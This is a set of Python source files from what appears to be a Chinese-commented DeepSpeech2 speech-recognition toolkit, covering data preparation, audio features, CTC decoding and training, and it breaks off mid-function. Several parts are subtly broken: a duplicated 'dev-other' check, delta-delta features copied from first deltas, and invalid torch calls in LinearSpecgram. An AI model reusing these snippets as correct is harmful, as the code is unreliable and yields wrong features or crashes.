parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument("--target_dir",
default="../dataset/audio/",
type=str,
help="存放音频文件的目录 (默认: %(default)s)")
parser.add_argument("--annotation_text",
default="../dataset/annotation/",
type=str,
help="存放音频标注文件的目录 (默认: %(default)s)")
args = parser.parse_args()
def create_annotation_text(data_dir, annotation_path):
print('Create Librispeech annotation text ...')
if not os.path.exists(annotation_path):
os.makedirs(annotation_path)
if not os.path.exists(os.path.join(annotation_path, 'test.txt')):
f_train = open(os.path.join(annotation_path, 'librispeech.txt'), 'w', encoding='utf-8')
else:
f_train = open(os.path.join(annotation_path, 'librispeech.txt'), 'a', encoding='utf-8')
if not os.path.exists(os.path.join(annotation_path, 'test.txt')):
f_test = open(os.path.join(annotation_path, 'test.txt'), 'w', encoding='utf-8')
else:
f_test = open(os.path.join(annotation_path, 'test.txt'), 'a', encoding='utf-8')
for subfolder, _, filelist in sorted(os.walk(data_dir)):
text_filelist = [filename for filename in filelist if filename.endswith('trans.txt')]
if len(text_filelist) > 0:
text_filepath = os.path.join(subfolder, text_filelist[0])
for line in io.open(text_filepath, encoding="utf8"):
segments = line.strip().split()
text = ' '.join(segments[1:]).lower()
audio_filepath = os.path.join(subfolder, segments[0] + '.flac')
if 'test-clean' not in subfolder and 'test-other' not in subfolder and \
'dev-other' not in subfolder and 'dev-other' not in subfolder:
f_train.write(audio_filepath[3:] + '\t' + text + '\n')
else:
if 'test-clean' in subfolder:
f_test.write(audio_filepath[3:] + '\t' + text + '\n')
f_test.close()
f_train.close()
def prepare_dataset(url, md5sum, target_dir, annotation_path):
"""Download, unpack and create summmary manifest file."""
data_dir = os.path.join(target_dir, 'LibriSpeech')
# download
filepath = download(url, md5sum, target_dir)
# unpack
unpack(filepath, target_dir)
create_annotation_text(data_dir, annotation_path)
def main():
if args.target_dir.startswith('~'):
args.target_dir = os.path.expanduser(args.target_dir)
prepare_dataset(url=URL_TEST_CLEAN,
md5sum=MD5_TEST_CLEAN,
target_dir=args.target_dir,
annotation_path=args.annotation_text)
prepare_dataset(url=URL_DEV_CLEAN,
md5sum=MD5_DEV_CLEAN,
target_dir=args.target_dir,
annotation_path=args.annotation_text)
prepare_dataset(url=URL_TRAIN_CLEAN_100,
md5sum=MD5_TRAIN_CLEAN_100,
target_dir=args.target_dir,
annotation_path=args.annotation_text)
prepare_dataset(url=URL_TEST_OTHER,
md5sum=MD5_TEST_OTHER,
target_dir=args.target_dir,
annotation_path=args.annotation_text)
prepare_dataset(url=URL_DEV_OTHER,
md5sum=MD5_DEV_OTHER,
target_dir=args.target_dir,
annotation_path=args.annotation_text)
prepare_dataset(url=URL_TRAIN_CLEAN_360,
md5sum=MD5_TRAIN_CLEAN_360,
target_dir=args.target_dir,
annotation_path=args.annotation_text)
prepare_dataset(url=URL_TRAIN_OTHER_500,
md5sum=MD5_TRAIN_OTHER_500,
target_dir=args.target_dir,
annotation_path=args.annotation_text)
if __name__ == '__main__':
main()
```
#### File: data_utils/augmentor/volume_perturb.py
```python
from masr.data_utils.augmentor.base import AugmentorBase
class VolumePerturbAugmentor(AugmentorBase):
"""添加随机体积扰动的增强模型
This is used for multi-loudness training of PCEN. See
https://arxiv.org/pdf/1607.05666v1.pdf
for more details.
:param rng: Random generator object.
:type rng: random.Random
:param min_gain_dBFS: Minimal gain in dBFS.
:type min_gain_dBFS: float
:param max_gain_dBFS: Maximal gain in dBFS.
:type max_gain_dBFS: float
"""
def __init__(self, rng, min_gain_dBFS, max_gain_dBFS):
self._min_gain_dBFS = min_gain_dBFS
self._max_gain_dBFS = max_gain_dBFS
self._rng = rng
def transform_audio(self, audio_segment):
"""Change audio loadness.
Note that this is an in-place transformation.
:param audio_segment: Audio segment to add effects to.
:type audio_segment: AudioSegmenet|SpeechSegment
"""
gain = self._rng.uniform(self._min_gain_dBFS, self._max_gain_dBFS)
audio_segment.gain_db(gain)
```
#### File: data_utils/featurizer/audio_featurizer.py
```python
import numpy as np
from python_speech_features import delta
from python_speech_features import logfbank
from python_speech_features import mfcc
from masr.data_utils.audio import AudioSegment
class AudioFeaturizer(object):
"""音频特征器,用于从AudioSegment或SpeechSegment内容中提取特性。
Currently, it supports feature types of linear spectrogram and mfcc.
:param stride_ms: Striding size (in milliseconds) for generating frames.
:type stride_ms: float
:param window_ms: Window size (in milliseconds) for generating frames.
:type window_ms: float
:param target_sample_rate: Audio are resampled (if upsampling or
downsampling is allowed) to this before
extracting spectrogram features.
:type target_sample_rate: int
:param use_dB_normalization: Whether to normalize the audio to a certain
decibels before extracting the features.
:type use_dB_normalization: bool
:param target_dB: Target audio decibels for normalization.
:type target_dB: float
"""
def __init__(self,
feature_method='linear',
stride_ms=10.0,
window_ms=20.0,
target_sample_rate=16000,
use_dB_normalization=True,
target_dB=-20):
self._feature_method = feature_method
self._stride_ms = stride_ms
self._window_ms = window_ms
self._target_sample_rate = target_sample_rate
self._use_dB_normalization = use_dB_normalization
self._target_dB = target_dB
def featurize(self, audio_segment, allow_downsampling=True, allow_upsampling=True):
"""从AudioSegment或SpeechSegment中提取音频特征
:param audio_segment: Audio/speech segment to extract features from.
:type audio_segment: AudioSegment|SpeechSegment
:param allow_downsampling: Whether to allow audio downsampling before featurizing.
:type allow_downsampling: bool
:param allow_upsampling: Whether to allow audio upsampling before featurizing.
:type allow_upsampling: bool
:return: Spectrogram audio feature in 2darray.
:rtype: ndarray
:raises ValueError: If audio sample rate is not supported.
"""
# upsampling or downsampling
if ((audio_segment.sample_rate > self._target_sample_rate and
allow_downsampling) or
(audio_segment.sample_rate < self._target_sample_rate and
allow_upsampling)):
audio_segment.resample(self._target_sample_rate)
if audio_segment.sample_rate != self._target_sample_rate:
raise ValueError("Audio sample rate is not supported. "
"Turn allow_downsampling or allow up_sampling on.")
# decibel normalization
if self._use_dB_normalization:
audio_segment.normalize(target_db=self._target_dB)
# extract spectrogram
if self._feature_method == 'linear':
return self._compute_linear(audio_segment.samples, audio_segment.sample_rate,
stride_ms=self._stride_ms, window_ms=self._window_ms)
elif self._feature_method == 'mfcc':
samples = audio_segment.to('int16')
return self._compute_mfcc(samples=samples, sample_rate=audio_segment.sample_rate,
stride_ms=self._stride_ms, window_ms=self._window_ms)
elif self._feature_method == 'fbank':
samples = audio_segment.to('int16')
return self._compute_fbank(samples=samples, sample_rate=audio_segment.sample_rate,
stride_ms=self._stride_ms, window_ms=self._window_ms)
else:
raise Exception('没有{}预处理方法'.format(self._feature_method))
# 用快速傅里叶变换计算线性谱图
@staticmethod
def _compute_linear(samples, sample_rate, stride_ms=10.0, window_ms=20.0, eps=1e-14):
stride_size = int(0.001 * sample_rate * stride_ms)
window_size = int(0.001 * sample_rate * window_ms)
truncate_size = (len(samples) - window_size) % stride_size
samples = samples[:len(samples) - truncate_size]
nshape = (window_size, (len(samples) - window_size) // stride_size + 1)
nstrides = (samples.strides[0], samples.strides[0] * stride_size)
windows = np.lib.stride_tricks.as_strided(samples, shape=nshape, strides=nstrides)
assert np.all(windows[:, 1] == samples[stride_size:(stride_size + window_size)])
# 快速傅里叶变换
weighting = np.hanning(window_size)[:, None]
fft = np.fft.rfft(windows * weighting, n=None, axis=0)
fft = np.absolute(fft)
fft = fft ** 2
scale = np.sum(weighting ** 2) * sample_rate
fft[1:-1, :] *= (2.0 / scale)
fft[(0, -1), :] /= scale
freqs = float(sample_rate) / window_size * np.arange(fft.shape[0])
ind = np.where(freqs <= (sample_rate / 2))[0][-1] + 1
linear_feat = np.log(fft[:ind, :] + eps) # dim=161
return linear_feat
@staticmethod
def _compute_mfcc(samples, sample_rate, stride_ms=10.0, window_ms=25.0):
# 计算MFCC
mfcc_feat = mfcc(signal=samples,
samplerate=sample_rate,
winlen=0.001 * window_ms,
winstep=0.001 * stride_ms,
highfreq=(sample_rate / 2))
# Deltas
d_feat = delta(mfcc_feat, 2)
# Deltas-Deltas
dd_feat = delta(mfcc_feat, 2)
# concat above three features
mfcc_feat = np.concatenate((mfcc_feat, d_feat, dd_feat), axis=1) # dim=39
mfcc_feat = mfcc_feat.transpose([1, 0])
return mfcc_feat
def _compute_fbank(self,
samples,
sample_rate,
stride_ms=10.0,
window_ms=25.0):
# 计算fbank
fbank_feat = logfbank(signal=samples,
samplerate=sample_rate,
winlen=0.001 * window_ms,
winstep=0.001 * stride_ms,
lowfreq=20,
highfreq=(sample_rate / 2),
wintype='povey')
# Deltas
d_feat = delta(fbank_feat, 2)
# Deltas-Deltas
dd_feat = delta(fbank_feat, 2)
# concat above three features
fbank_feat = np.concatenate((fbank_feat, d_feat, dd_feat), axis=1) # dim=120
fbank_feat = fbank_feat.transpose([1, 0])
return fbank_feat
@property
def feature_dim(self):
"""返回特征大小
:return: 特征大小
:rtype: int
"""
if self._feature_method == 'linear':
return 161
elif self._feature_method == 'mfcc':
return 39
elif self._feature_method == 'fbank':
return 120
else:
raise Exception('没有{}预处理方法'.format(self._feature_method))
```
#### File: masr/decoders/swig_wrapper.py
```python
import swig_decoders
class Scorer(swig_decoders.Scorer):
"""Wrapper for Scorer.
:param alpha: 与语言模型相关的参数。当alpha = 0时不要使用语言模型
:type alpha: float
:param beta: 与字计数相关的参数。当beta = 0时不要使用统计字
:type beta: float
:model_path: 语言模型的路径
:type model_path: str
"""
def __init__(self, alpha, beta, model_path, vocabulary):
swig_decoders.Scorer.__init__(self, alpha, beta, model_path, vocabulary)
def ctc_greedy_decoder(probs_seq, vocabulary, blank_id):
"""CTC贪婪(最佳路径)解码器
由最可能的令牌组成的路径将被进一步后处理到去掉连续重复和所有空白
:param probs_seq: 每一条都是2D的概率表。每个元素都是浮点数概率的列表一个字符
:type probs_seq: numpy.ndarray
:param vocabulary: 词汇列表
:type vocabulary: list
:param blank_index 需要移除的空白索引
:type blank_index int
:return: 解码后得到的字符串
:rtype: baseline
"""
result = swig_decoders.ctc_greedy_decoder(probs_seq.tolist(), vocabulary, blank_id)
return result
def ctc_beam_search_decoder(probs_seq,
vocabulary,
beam_size,
cutoff_prob=1.0,
cutoff_top_n=40,
blank_id=0,
ext_scoring_func=None):
"""集束搜索解码器
:param probs_seq: 单个2-D概率分布列表,每个元素是词汇表和空白上的标准化概率列表
:type probs_seq: 2-D list
:param vocabulary: 词汇列表
:type vocabulary: list
:param beam_size: 集束搜索宽度
:type beam_size: int
:param cutoff_prob: 剪枝中的截断概率,默认1.0,没有剪枝
:type cutoff_prob: float
:param cutoff_top_n: 剪枝时的截断数,仅在词汇表中具有最大probs的cutoff_top_n字符用于光束搜索,默认为40
:type cutoff_top_n: int
:param blank_id 空白索引
:type blank_id int
:param ext_scoring_func: 外部评分功能部分解码句子,如字计数或语言模型
:type ext_scoring_func: callable
:return: 解码结果为log概率和句子的元组列表,按概率降序排列
:rtype: list
"""
beam_results = swig_decoders.ctc_beam_search_decoder(
probs_seq.tolist(), vocabulary, beam_size, cutoff_prob, cutoff_top_n, ext_scoring_func, blank_id)
beam_results = [(res[0], res[1]) for res in beam_results]
return beam_results
def ctc_beam_search_decoder_batch(probs_split,
vocabulary,
beam_size,
num_processes,
cutoff_prob=1.0,
cutoff_top_n=40,
blank_id=0,
ext_scoring_func=None):
"""Wrapper for the batched CTC beam search decoder.
:param probs_seq: 3-D列表,每个元素作为ctc_beam_search_decoder()使用的2-D概率列表的实例
:type probs_seq: 3-D list
:param vocabulary: 词汇列表
:type vocabulary: list
:param beam_size: 集束搜索宽度
:type beam_size: int
:param cutoff_prob: 剪枝中的截断概率,默认1.0,没有剪枝
:type cutoff_prob: float
:param cutoff_top_n: 剪枝时的截断数,仅在词汇表中具有最大probs的cutoff_top_n字符用于光束搜索,默认为40
:type cutoff_top_n: int
:param blank_id 空白索引
:type blank_id int
:param num_processes: 并行解码进程数
:type num_processes: int
:param ext_scoring_func: 外部评分功能部分解码句子,如字计数或语言模型
:type ext_scoring_func: callable
:return: 解码结果为log概率和句子的元组列表,按概率降序排列的列表
:rtype: list
"""
probs_split = [probs_seq.tolist() for probs_seq in probs_split]
batch_beam_results = swig_decoders.ctc_beam_search_decoder_batch(
probs_split, vocabulary, beam_size, num_processes, cutoff_prob,
cutoff_top_n, ext_scoring_func, blank_id)
batch_beam_results = [[(res[0], res[1]) for res in beam_results]
for beam_results in batch_beam_results]
return batch_beam_results
```
#### File: model_utils/deepspeech2/conv.py
```python
from torch import nn
__all__ = ['ConvStack']
class ConvBn(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride, input_dim):
super().__init__()
self.kernel_size = kernel_size
self.stride = stride
self.conv = nn.Conv2d(in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
stride=stride)
self.act = nn.GELU()
# self.dropout = nn.Dropout()
self.output_dim = (input_dim - self.kernel_size) // self.stride + 1
def forward(self, x, x_len):
x = self.conv(x)
x = self.act(x)
# x = self.dropout(x)
x_len = ((x_len - self.kernel_size) / self.stride + 1).int()
return x, x_len
class ConvStack(nn.Module):
"""具有堆叠卷积层的卷积组
:param feat_size: 输入音频的特征大小
:type feat_size: int
:param conv_out_channels: 卷积层输出大小
:type conv_out_channels: int
"""
def __init__(self, feat_size, conv_out_channels):
super().__init__()
self.conv1 = ConvBn(in_channels=1,
out_channels=conv_out_channels,
kernel_size=3,
stride=2,
input_dim=feat_size)
self.conv2 = ConvBn(in_channels=conv_out_channels,
out_channels=conv_out_channels,
kernel_size=3,
stride=2,
input_dim=self.conv1.output_dim)
self.output_dim = self.conv2.output_dim * conv_out_channels
def forward(self, x, x_len):
"""
x: shape [B, D, T]
x_len : shape [B]
"""
# [B, D, T] -> [B, T, D]
x = x.permute(0, 2, 1)
# [B, T, D] -> [B, C=1, T, D]
x = x.unsqueeze(1)
x, x_len = self.conv1(x, x_len)
x, x_len = self.conv2(x, x_len)
# 将数据从卷积特征映射转换为向量序列
x = x.permute(0, 2, 1, 3) # [B, T, C, D]
x = x.reshape([x.shape[0], x.shape[1], -1]) # [B, T, C*D]
return x, x_len
```
#### File: masr/model_utils/utils.py
```python
import math
import torch
from torch import nn
from masr.model_utils.deepspeech2.model import DeepSpeech2Model
__all__ = ['Normalizer', 'DeepSpeech2ModelExport']
# 对数据归一化模型
class Normalizer(nn.Module):
def __init__(self, mean, std):
super().__init__()
self.mean = mean
self.std = std
self.eps = 1e-20
def forward(self, x):
x = (x - self.mean) / (self.std + self.eps)
return x
# 导出使用的DeepSpeech2Model模型
class DeepSpeech2ModelExport(torch.nn.Module):
def __init__(self, model:DeepSpeech2Model, feature_mean, feature_std):
super(DeepSpeech2ModelExport, self).__init__()
self.normalizer = Normalizer(feature_mean, feature_std)
self.model = model
# 在输出层加上Softmax
self.softmax = torch.nn.Softmax(dim=2)
def forward(self, audio, audio_len, init_state_h_box):
x = self.normalizer(audio)
logits, _, final_chunk_state_h_box = self.model(x, audio_len, init_state_h_box)
output = self.softmax(logits)
return output, final_chunk_state_h_box
class LinearSpecgram(nn.Module):
def __init__(self, stride_ms=10.0, window_ms=20.0, audio_rate=16000, use_db_normalization=True, target_db=-20):
super().__init__()
self._stride_ms = stride_ms
self._window_ms = window_ms
self._audio_rate = audio_rate
self._use_dB_normalization = use_db_normalization
self._target_dB = target_db
self._eps = 1e-14
self._stride_size = int(0.001 * self._audio_rate * self._stride_ms)
self._window_size = int(0.001 * self._audio_rate * self._window_ms)
def forward(self, audio):
audio = audio.astype(torch.float64)
audio = self.normalize(audio)
truncate_size = (audio.shape[-1] - self._window_size) % self._stride_size
audio = audio[:audio.shape[-1] - truncate_size]
windows = self.as_strided(audio, kernel_size=self._window_size, strides=self._stride_size)
weighting = self.hanning(self._window_size)[:, None]
# 快速傅里叶变换
fft = torch.fft.rfft(windows * weighting, n=None, dim=0)
fft = torch.abs(fft)
fft = fft ** 2
scale = torch.sum(weighting ** 2) * self._audio_rate
fft[1:-1, :] *= (2.0 / scale)
fft[0, :] /= scale
fft[-1, :] /= scale
return torch.log(fft + self._eps)
def normalize(self, audio, max_gain_db=300.0):
"""将音频归一化,使其具有所需的有效值(以分贝为单位)"""
gain = self._target_dB - self.rms_db(audio)
return self.gain_db(audio, min(max_gain_db, gain))
@staticmethod
def gain_db(audio, gain):
"""对音频施加分贝增益"""
audio *= 10. ** (gain / 20.)
return audio
@staticmethod
def rms_db(audio):
"""返回以分贝为单位的音频均方根能量"""
mean_square = torch.mean(audio ** 2)
return 10 * torch.log10(mean_square)
@staticmethod
def as_strided(x, kernel_size, strides): # x.shape[L] kernel_size=320, strides=160
x = x.unsqueeze(0).unsqueeze(0).unsqueeze(0)
x = torch.nn.functional.unfold(x, kernel_sizes=[1, kernel_size], stride=strides)
x = x.squeeze(0)
return x
@staticmethod
def hanning(M): # M=320
pi = torch.from_numpy(math.pi)
n = torch.arange(1 - M, M, 2)
k = pi * n / torch.from_numpy((M - 1))
return 0.5 + 0.5 * torch.cos(k)
```
#### File: masr/masr/trainer.py
```python
import io
import json
import os
import platform
import shutil
import sys
import time
from collections import Counter
from datetime import datetime
from datetime import timedelta
import torch
import torch.distributed as dist
from torch.optim.lr_scheduler import StepLR
from torch.utils.data import DataLoader
from tqdm import tqdm
from visualdl import LogWriter
from masr.data_utils.collate_fn import collate_fn
from masr.data_utils.featurizer.audio_featurizer import AudioFeaturizer
from masr.data_utils.featurizer.text_featurizer import TextFeaturizer
from masr.data_utils.normalizer import FeatureNormalizer
from masr.data_utils.reader import MASRDataset
from masr.data_utils.sampler import DSRandomSampler, DSElasticDistributedSampler
from masr.decoders.ctc_greedy_decoder import greedy_decoder_batch
from masr.model_utils.deepspeech2.model import DeepSpeech2Model
from masr.model_utils.utils import DeepSpeech2ModelExport
from masr.utils.metrics import cer, wer
from masr.utils.utils import create_manifest, create_noise, count_manifest, compute_mean_std
from masr.utils.utils import labels_to_string
class MASRTrainer(object):
def __init__(self,
use_model='deepspeech2',
feature_method='linear',
mean_std_path='dataset/mean_std.npz',
train_manifest='dataset/manifest.train',
test_manifest='dataset/manifest.test',
dataset_vocab='dataset/vocabulary.txt',
num_workers=8,
alpha=2.2,
beta=4.3,
beam_size=300,
num_proc_bsearch=10,
cutoff_prob=0.99,
cutoff_top_n=40,
decoder='ctc_greedy',
metrics_type='cer',
lang_model_path='lm/zh_giga.no_cna_cmn.prune01244.klm'):
"""
PPASR集成工具类
:param use_model: 所使用的模型
:param feature_method: 所使用的预处理方法
:param mean_std_path: 数据集的均值和标准值的npy文件路径
:param train_manifest: 训练数据的数据列表路径
:param test_manifest: 测试数据的数据列表路径
:param dataset_vocab: 数据字典的路径
:param num_workers: 读取数据的线程数量
:param alpha: 集束搜索的LM系数
:param beta: 集束搜索的WC系数
:param beam_size: 集束搜索的大小,范围:[5, 500]
:param num_proc_bsearch: 集束搜索方法使用CPU数量
:param cutoff_prob: 剪枝的概率
:param cutoff_top_n: 剪枝的最大值
:param metrics_type: 计算错误方法
:param decoder: 结果解码方法,支持ctc_beam_search和ctc_greedy
:param lang_model_path: 语言模型文件路径
"""
self.use_model = use_model
self.feature_method = feature_method
self.mean_std_path = mean_std_path
self.train_manifest = train_manifest
self.test_manifest = test_manifest
self.dataset_vocab = dataset_vocab
if platform.system().lower() == 'windows':
self.num_workers = 0
print('[{}] Windows系统不支持多线程读取数据,已自动关闭!'.format(datetime.now()), file=sys.stderr)
else:
self.num_workers = num_workers
self.alpha = alpha
self.beta = beta
self.beam_size = beam_size
self.num_proc_bsearch = num_proc_bsearch
self.cutoff_prob = cutoff_prob
self.cutoff_top_n = cutoff_top_n
self.decoder = decoder
self.metrics_type = metrics_type
self.lang_model_path = lang_model_path
self.beam_search_decoder = None
def create_data(self,
annotation_path='dataset/annotation/',
noise_manifest_path='dataset/manifest.noise',
noise_path='dataset/audio/noise',
num_samples=1000000,
count_threshold=2,
is_change_frame_rate=True,
max_test_manifest=10000):
"""
创建数据列表和词汇表
:param annotation_path: 标注文件的路径
:param noise_manifest_path: 噪声数据列表的路径
:param noise_path: 噪声音频存放的文件夹路径
:param num_samples: 用于计算均值和标准值得音频数量,当为-1使用全部数据
:param count_threshold: 字符计数的截断阈值,0为不做限制
:param is_change_frame_rate: 是否统一改变音频为16000Hz,这会消耗大量的时间
:param max_test_manifest: 生成测试数据列表的最大数量,如果annotation_path包含了test.txt,就全部使用test.txt的数据
"""
print('开始生成数据列表...')
create_manifest(annotation_path=annotation_path,
train_manifest_path=self.train_manifest,
test_manifest_path=self.test_manifest,
is_change_frame_rate=is_change_frame_rate,
max_test_manifest=max_test_manifest)
print('=' * 70)
print('开始生成噪声数据列表...')
create_noise(path=noise_path,
noise_manifest_path=noise_manifest_path,
is_change_frame_rate=is_change_frame_rate)
print('=' * 70)
print('开始生成数据字典...')
counter = Counter()
count_manifest(counter, self.train_manifest)
count_sorted = sorted(counter.items(), key=lambda x: x[1], reverse=True)
with open(self.dataset_vocab, 'w', encoding='utf-8') as fout:
fout.write('<blank>\t-1\n')
for char, count in count_sorted:
if char == ' ': char = '<space>'
# 跳过指定的字符阈值,超过这大小的字符都忽略
if count < count_threshold: break
fout.write('%s\t%d\n' % (char, count))
print('数据字典生成完成!')
print('=' * 70)
print('开始抽取{}条数据计算均值和标准值...'.format(num_samples))
compute_mean_std(feature_method=self.feature_method,
manifest_path=self.train_manifest,
output_path=self.mean_std_path,
num_samples=num_samples,
num_workers=self.num_workers)
def evaluate(self,
batch_size=32,
min_duration=0,
max_duration=-1,
resume_model='models/deepspeech2/best_model/'):
"""
评估模型
:param batch_size: 评估的批量大小
:param min_duration: 过滤最短的音频长度
:param max_duration: 过滤最长的音频长度,当为-1的时候不限制长度
:param resume_model: 所使用的模型
:return: 评估结果
"""
# 获取测试数据
test_dataset = MASRDataset(data_list=self.test_manifest,
vocab_filepath=self.dataset_vocab,
mean_std_filepath=self.mean_std_path,
feature_method=self.feature_method)
test_loader = DataLoader(dataset=test_dataset,
batch_size=batch_size,
collate_fn=collate_fn,
num_workers=self.num_workers)
# 获取模型
if self.use_model == 'deepspeech2':
model = DeepSpeech2Model(feat_size=test_dataset.feature_dim, vocab_size=test_dataset.vocab_size)
else:
raise Exception('没有该模型:{}'.format(self.use_model))
assert os.path.exists(os.path.join(resume_model, 'model.pt')), "模型不存在!"
model.load_state_dict(torch.load(os.path.join(resume_model, 'model.pt')))
model.eval()
c = []
for inputs, labels, input_lens, _ in tqdm(test_loader):
# 执行识别
outs, out_lens, _ = model(inputs, input_lens)
outs = torch.nn.functional.softmax(outs, 2)
# 解码获取识别结果
outs = outs.cpu().detach().numpy()
out_strings = self.decoder_result(outs, out_lens, test_dataset.vocab_list)
labels_str = labels_to_string(labels.numpy(), test_dataset.vocab_list)
for out_string, label in zip(*(out_strings, labels_str)):
# 计算字错率或者词错率
if self.metrics_type == 'wer':
c.append(wer(out_string, label))
else:
c.append(cer(out_string, label))
cer_result = float(sum(c) / len(c))
return cer_result
def train(self,
batch_size=32,
min_duration=0.5,
max_duration=20,
num_epoch=50,
learning_rate=5e-5,
save_model_path='models/',
resume_model=None,
pretrained_model=None,
augment_conf_path='conf/augmentation.json'):
"""
训练模型
:param batch_size: 训练的批量大小
:param min_duration: 过滤最短的音频长度
:param max_duration: 过滤最长的音频长度,当为-1的时候不限制长度
:param num_epoch: 训练的轮数
:param learning_rate: 初始学习率的大小
:param save_model_path: 模型保存的路径
:param resume_model: 恢复训练,当为None则不使用预训练模型
:param pretrained_model: 预训练模型的路径,当为None则不使用预训练模型
:param augment_conf_path: 数据增强的配置文件,为json格式
"""
# 获取有多少张显卡训练
nranks = torch.cuda.device_count()
local_rank = 0
if nranks > 1:
# 初始化NCCL环境
dist.init_process_group(backend='nccl')
local_rank = dist.get_rank()
if local_rank == 0:
# 日志记录器
writer = LogWriter(logdir='log')
# 获取训练数据
if augment_conf_path is not None and os.path.exists(augment_conf_path):
augmentation_config = io.open(augment_conf_path, mode='r', encoding='utf8').read()
else:
if augment_conf_path is not None and not os.path.exists(augment_conf_path):
print('[{}] 数据增强配置文件{}不存在'.format(datetime.now(), augment_conf_path), file=sys.stderr)
augmentation_config = '{}'
train_dataset = MASRDataset(data_list=self.train_manifest,
vocab_filepath=self.dataset_vocab,
feature_method=self.feature_method,
mean_std_filepath=self.mean_std_path,
min_duration=min_duration,
max_duration=max_duration,
augmentation_config=augmentation_config)
# 设置支持多卡训练
if nranks > 1:
train_batch_sampler = DSElasticDistributedSampler(train_dataset,
batch_size=batch_size,
sortagrad=True,
drop_last=True,
shuffle=True)
else:
train_batch_sampler = DSRandomSampler(train_dataset,
batch_size=batch_size,
sortagrad=True,
drop_last=True,
shuffle=True)
train_loader = DataLoader(dataset=train_dataset,
collate_fn=collate_fn,
batch_sampler=train_batch_sampler,
num_workers=self.num_workers)
# 获取测试数据
test_dataset = MASRDataset(data_list=self.test_manifest,
vocab_filepath=self.dataset_vocab,
feature_method=self.feature_method,
mean_std_filepath=self.mean_std_path,
min_duration=min_duration,
max_duration=max_duration)
test_loader = DataLoader(dataset=test_dataset,
batch_size=batch_size,
collate_fn=collate_fn,
num_workers=self.num_workers)
# 获取模型
if self.use_model == 'deepspeech2':
model = DeepSpeech2Model(feat_size=train_dataset.feature_dim, vocab_size=train_dataset.vocab_size)
else:
raise Exception('没有该模型:{}'.format(self.use_model))
# 设置优化方法
optimizer = torch.optim.AdamW(params=model.parameters(), lr=learning_rate, weight_decay=1e-6)
torch.cuda.set_device(local_rank)
model.cuda(local_rank)
if nranks > 1:
model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[local_rank])
print('[{}] 训练数据:{}'.format(datetime.now(), len(train_dataset)))
# 加载预训练模型
if pretrained_model is not None:
assert os.path.exists(os.path.join(pretrained_model, 'model.pt')), "模型参数文件不存在!"
pretrained_dict = torch.load(os.path.join(pretrained_model, 'model.pt'))
model_dict = model.state_dict()
# 将pretrained_dict里不属于model_dict的键剔除掉
pretrained_dict = {k: v for k, v in pretrained_dict.items() if k in model_dict}
model_dict.update(pretrained_dict)
model.load_state_dict(model_dict)
print('[{}] 成功加载预训练模型:{}'.format(datetime.now(), pretrained_model))
# 加载恢复模型
last_epoch = -1
last_model_dir = os.path.join(save_model_path, self.use_model, 'last_model')
if resume_model is not None or (os.path.exists(os.path.join(last_model_dir, 'model.pt'))
and os.path.exists(os.path.join(last_model_dir, 'optimizer.pt'))):
# 自动获取最新保存的模型
if resume_model is None: resume_model = last_model_dir
assert os.path.exists(os.path.join(resume_model, 'model.pt')), "模型参数文件不存在!"
assert os.path.exists(os.path.join(resume_model, 'optimizer.pt')), "优化方法参数文件不存在!"
if nranks > 1:
model.module.load_state_dict(torch.load(os.path.join(resume_model, 'model.pt')))
else:
model.load_state_dict(torch.load(os.path.join(resume_model, 'model.pt')))
optimizer.load_state_dict(torch.load(os.path.join(resume_model, 'optimizer.pt')))
with open(os.path.join(resume_model, 'model.state'), 'r', encoding='utf-8') as f:
last_epoch = json.load(f)['last_epoch'] - 1
print('[{}] 成功恢复模型参数和优化方法参数:{}'.format(datetime.now(), resume_model))
scheduler = StepLR(optimizer, step_size=1, gamma=0.93, last_epoch=last_epoch)
# 获取损失函数
ctc_loss = torch.nn.CTCLoss(reduction='none', zero_infinity=True)
test_step, train_step = 0, 0
best_test_cer = 1
train_times = []
sum_batch = len(train_loader) * num_epoch
if local_rank == 0:
writer.add_scalar('Train/lr', scheduler.get_last_lr()[0], last_epoch)
try:
# 开始训练
for epoch in range(last_epoch, num_epoch):
epoch += 1
start_epoch = time.time()
start = time.time()
for batch_id, (inputs, labels, input_lens, label_lens) in enumerate(train_loader):
inputs = inputs.cuda()
labels = labels.cuda()
out, out_lens, _ = model(inputs, input_lens)
out = out.log_softmax(2)
out = out.permute(1, 0, 2)
# 计算损失
label_lens = label_lens.cuda()
loss = ctc_loss(out, labels, out_lens, label_lens)
loss = loss.mean()
loss.backward()
optimizer.step()
optimizer.zero_grad()
train_times.append((time.time() - start) * 1000)
# 多卡训练只使用一个进程打印
if batch_id % 100 == 0 and local_rank == 0:
eta_sec = (sum(train_times) / len(train_times)) * (
sum_batch - (epoch - 1) * len(train_loader) - batch_id)
eta_str = str(timedelta(seconds=int(eta_sec / 1000)))
print(
'[{}] Train epoch: [{}/{}], batch: [{}/{}], loss: {:.5f}, learning rate: {:>.8f}, eta: {}'.format(
datetime.now(), epoch, num_epoch, batch_id, len(train_loader),
loss.cpu().detach().numpy(), scheduler.get_last_lr()[0], eta_str))
writer.add_scalar('Train/Loss', loss.cpu().detach().numpy(), train_step)
train_step += 1
train_times = []
# 固定步数也要保存一次模型
if batch_id % 10000 == 0 and batch_id != 0 and local_rank == 0:
if nranks > 1:
self.save_model(save_model_path=save_model_path, use_model=self.use_model, epoch=epoch,
model=model.module, optimizer=optimizer)
else:
self.save_model(save_model_path=save_model_path, use_model=self.use_model, epoch=epoch,
model=model, optimizer=optimizer)
start = time.time()
# 多卡训练只使用一个进程执行评估和保存模型
if local_rank == 0:
# 执行评估
model.eval()
print('\n', '=' * 70)
c, l = self.__test(model, test_loader, test_dataset.vocab_list, ctc_loss)
print('[{}] Test epoch: {}, time/epoch: {}, loss: {:.5f}, cer: {:.5f}'.format(
datetime.now(), epoch, str(timedelta(seconds=(time.time() - start_epoch))), l, c))
print('=' * 70, '\n')
writer.add_scalar('Test/Cer', c, test_step)
writer.add_scalar('Test/Loss', l, test_step)
test_step += 1
model.train()
# 记录学习率
writer.add_scalar('Train/lr', scheduler.get_last_lr()[0], epoch)
# 保存最优模型
if c <= best_test_cer:
best_test_cer = c
if nranks > 1:
self.save_model(save_model_path=save_model_path, use_model=self.use_model, model=model.module,
optimizer=optimizer, epoch=epoch, error_type=self.metrics_type, error_rate=c, test_loss=l, best_model=True)
else:
self.save_model(save_model_path=save_model_path, use_model=self.use_model, model=model,
